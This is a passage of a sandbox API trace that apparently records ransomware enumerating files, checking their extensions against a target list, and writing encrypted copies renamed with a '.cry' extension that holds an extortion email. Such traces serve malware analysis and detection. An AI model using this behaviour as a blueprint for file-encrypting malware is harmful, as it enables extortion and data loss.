(lpString1=".rar", lpString2=".mui") returned 1 [0052.961] lstrlenW (lpString=".bz2") returned 4 [0052.962] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.962] lstrlenW (lpString=".7z") returned 3 [0052.962] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.962] lstrlenW (lpString=".dbf") returned 4 [0052.962] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.962] lstrlenW (lpString=".1cd") returned 4 [0052.962] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.962] lstrlenW (lpString=".jpg") returned 4 [0052.962] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.962] lstrlenW (lpString=".doc") returned 4 [0052.962] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.962] lstrlenW (lpString=".docx") returned 5 [0052.962] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.962] lstrlenW (lpString=".pdf") returned 4 [0052.962] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.962] lstrlenW (lpString=".xls") returned 4 [0052.962] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.962] lstrlenW (lpString=".xlsx") returned 5 [0052.962] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.963] lstrlenW (lpString=".ppt") returned 4 [0052.963] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.963] lstrlenW (lpString=".zip") returned 4 [0052.963] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.963] lstrlenW (lpString=".rar") returned 4 [0052.963] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.963] lstrlenW (lpString=".bz2") returned 4 [0052.963] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.963] lstrlenW (lpString=".7z") returned 3 [0052.963] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.963] lstrlenW (lpString=".dbf") returned 4 [0052.963] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.963] lstrlenW (lpString=".1cd") returned 4 [0052.963] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 79 [0052.963] lstrlenW (lpString=".jpg") returned 4 [0052.963] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.963] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.963] lstrlenW (lpString="IpsMigrationPlugin.dll.mui") returned 26 [0052.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.963] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2560) returned 1 [0052.963] CloseHandle (hObject=0x1bc) returned 1 [0052.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui")) returned 0x20 [0052.964] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.964] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.964] lstrlenW (lpString=".doc") returned 4 [0052.964] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.964] lstrlenW (lpString=".docx") returned 5 [0052.964] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.964] lstrlenW (lpString=".pdf") returned 4 [0052.964] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.964] lstrlenW (lpString=".xls") returned 4 [0052.964] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.964] lstrlenW (lpString=".xlsx") returned 5 [0052.964] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.964] lstrlenW (lpString=".ppt") returned 4 [0052.964] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.964] lstrlenW (lpString=".zip") returned 4 [0052.964] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.964] lstrlenW (lpString=".rar") returned 4 [0052.964] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.964] lstrlenW (lpString=".bz2") returned 4 [0052.964] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.964] lstrlenW (lpString=".7z") returned 3 [0052.964] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.964] lstrlenW (lpString=".dbf") returned 4 [0052.964] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.964] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.964] lstrlenW (lpString=".1cd") returned 4 [0052.965] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.965] lstrlenW (lpString=".jpg") returned 4 [0052.965] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.965] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.965] lstrlenW (lpString=".doc") returned 4 [0052.965] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.965] lstrlenW (lpString=".docx") returned 5 [0052.965] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.966] lstrlenW (lpString=".pdf") returned 4 [0052.966] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.966] lstrlenW (lpString=".xls") returned 4 [0052.966] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.966] lstrlenW (lpString=".xlsx") returned 5 [0052.966] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.966] lstrlenW (lpString=".ppt") returned 4 [0052.966] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.966] lstrlenW (lpString=".zip") returned 4 [0052.966] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.966] lstrlenW (lpString=".rar") returned 4 [0052.966] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.966] lstrlenW (lpString=".bz2") returned 4 [0052.966] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.966] lstrlenW (lpString=".7z") returned 3 [0052.966] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.966] lstrlenW (lpString=".dbf") returned 4 [0052.966] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.966] lstrlenW (lpString=".1cd") returned 4 [0052.966] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.966] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 83 [0052.966] lstrlenW (lpString=".jpg") returned 4 [0052.966] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.966] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.966] lstrlenW (lpString="micaut.dll.mui") returned 14 [0052.966] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.971] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=8704) returned 1 [0052.971] CloseHandle (hObject=0x1bc) returned 1 [0052.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui")) returned 0x20 [0052.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString=".doc") returned 4 [0052.972] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.972] lstrlenW (lpString=".docx") returned 5 [0052.972] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.972] lstrlenW (lpString=".pdf") returned 4 [0052.972] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.972] lstrlenW (lpString=".xls") returned 4 [0052.972] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.972] lstrlenW (lpString=".xlsx") returned 5 [0052.972] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.972] lstrlenW (lpString=".ppt") returned 4 [0052.972] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString=".zip") returned 4 [0052.972] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.972] lstrlenW (lpString=".rar") returned 4 [0052.972] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.972] lstrlenW (lpString=".bz2") returned 4 [0052.972] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.972] lstrlenW (lpString=".7z") returned 3 [0052.972] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString=".dbf") returned 4 [0052.972] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString=".1cd") returned 4 [0052.972] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString=".jpg") returned 4 [0052.972] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.972] lstrlenW (lpString=".doc") returned 4 [0052.972] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.972] lstrlenW (lpString=".docx") returned 5 [0052.972] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.972] lstrlenW (lpString=".pdf") returned 4 [0052.973] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.973] lstrlenW (lpString=".xls") returned 4 [0052.973] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.973] lstrlenW (lpString=".xlsx") returned 5 [0052.973] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.973] lstrlenW (lpString=".ppt") returned 4 [0052.973] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.973] lstrlenW (lpString=".zip") returned 4 [0052.973] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.973] lstrlenW (lpString=".rar") returned 4 [0052.973] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.973] lstrlenW (lpString=".bz2") returned 4 [0052.973] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.973] lstrlenW (lpString=".7z") returned 3 [0052.973] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.973] lstrlenW (lpString=".dbf") returned 4 [0052.973] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.973] lstrlenW (lpString=".1cd") returned 4 [0052.973] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned 71 [0052.973] lstrlenW (lpString=".jpg") returned 4 [0052.973] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.973] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.973] lstrlenW (lpString="mip.exe.mui") returned 11 [0052.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.974] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=10240) returned 1 [0052.974] CloseHandle (hObject=0x1bc) returned 1 [0052.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui")) returned 0x20 [0052.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.974] lstrlenW (lpString=".doc") returned 4 [0052.974] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.974] lstrlenW (lpString=".docx") returned 5 [0052.974] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0052.974] lstrlenW (lpString=".pdf") returned 4 [0052.974] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.974] lstrlenW (lpString=".xls") returned 4 [0052.974] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.974] lstrlenW (lpString=".xlsx") returned 5 [0052.974] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0052.974] lstrlenW (lpString=".ppt") returned 4 [0052.974] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.974] lstrlenW (lpString=".zip") returned 4 [0052.974] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.974] lstrlenW (lpString=".rar") returned 4 [0052.974] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.974] lstrlenW (lpString=".bz2") returned 4 [0052.974] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.974] lstrlenW (lpString=".7z") returned 3 [0052.974] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.974] lstrlenW (lpString=".dbf") returned 4 [0052.974] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString=".1cd") returned 4 [0052.975] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString=".jpg") returned 4 [0052.975] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString=".doc") returned 4 [0052.975] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.975] lstrlenW (lpString=".docx") returned 5 [0052.975] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0052.975] lstrlenW (lpString=".pdf") returned 4 [0052.975] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.975] lstrlenW (lpString=".xls") returned 4 [0052.975] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.975] lstrlenW (lpString=".xlsx") returned 5 [0052.975] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0052.975] lstrlenW (lpString=".ppt") returned 4 [0052.975] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString=".zip") returned 4 [0052.975] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.975] lstrlenW (lpString=".rar") returned 4 [0052.975] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.975] lstrlenW (lpString=".bz2") returned 4 [0052.975] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.975] lstrlenW (lpString=".7z") returned 3 [0052.975] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString=".dbf") returned 4 [0052.975] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0052.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString=".1cd") returned 4 [0052.975] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0052.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 68 [0052.975] lstrlenW (lpString=".jpg") returned 4 [0052.975] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0052.976] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0052.976] lstrlenW (lpString="mshwLatin.dll.mui") returned 17 [0052.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0052.982] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2560) returned 1 [0052.982] CloseHandle (hObject=0x1bc) returned 1 [0052.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui")) returned 0x20 [0052.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0052.982] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0052.982] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0052.982] lstrlenW (lpString=".doc") returned 4 [0052.982] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0052.982] lstrlenW (lpString=".docx") returned 5 [0052.982] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0052.983] lstrlenW (lpString=".pdf") returned 4 [0052.983] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0052.983] lstrlenW (lpString=".xls") returned 4 [0052.983] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0052.983] lstrlenW (lpString=".xlsx") returned 5 [0052.983] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0052.983] lstrlenW (lpString=".ppt") returned 4 [0052.983] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0052.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0052.983] lstrlenW (lpString=".zip") returned 4 [0052.983] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0052.983] lstrlenW (lpString=".rar") returned 4 [0052.983] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0052.983] lstrlenW (lpString=".bz2") returned 4 [0052.983] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0052.983] lstrlenW (lpString=".7z") returned 3 [0052.983] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0052.983] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 74 [0052.983] lstrlenW (lpString=".dbf") returned 4 [0052.983] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0053.083] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.083] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0053.084] GetLastError () returned 0x0 [0053.084] ReadFile (in: hFile=0x190, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xcdb0, lpOverlapped=0x0) returned 1 [0053.179] WriteFile (in: hFile=0x1f4, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xcdc0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xcdc0, lpOverlapped=0x0) returned 1 [0053.181] ReadFile (in: hFile=0x190, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.181] WriteFile (in: hFile=0x1f4, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xec, 